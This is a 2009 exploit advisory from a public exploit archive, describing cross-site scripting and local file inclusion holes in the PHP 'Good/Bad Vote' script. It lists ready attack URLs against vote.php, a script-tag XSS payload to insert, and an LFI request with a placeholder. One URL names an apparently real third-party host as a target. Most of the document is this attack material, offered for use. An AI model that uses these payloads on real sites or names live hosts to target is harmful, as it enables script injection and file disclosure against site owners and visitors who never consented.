Good-Bad Vote (XSS-LFI) Multiple Remote Vulnerabilities

2009-07-17 20:23:29

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Good/Bad Vote (XSS/LFI) Vulnerability
==============================================================================

[»] Script: [ Good/Bad Vote ]
[»] Language: [ PHP ]
[»] Download: [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1086552418 ]
[»] Founder: [ Moudi <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ 6 US $ ]

###########################################################################

===[ Exploit XSS vulnerability ]===

[»] http://www.site.com/patch/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt

[»] http://searchall.iwebland.com:80/sigs/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt
XSS TO ADD: 1<script>alert(314154736094)</script>

===[ Exploit LFI ]===

[»] http://www.site.com/patch/vote.php?action=dovote&id=[LFI]&ficdest=.dat&midcast=.txt

Author: Moudi

###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.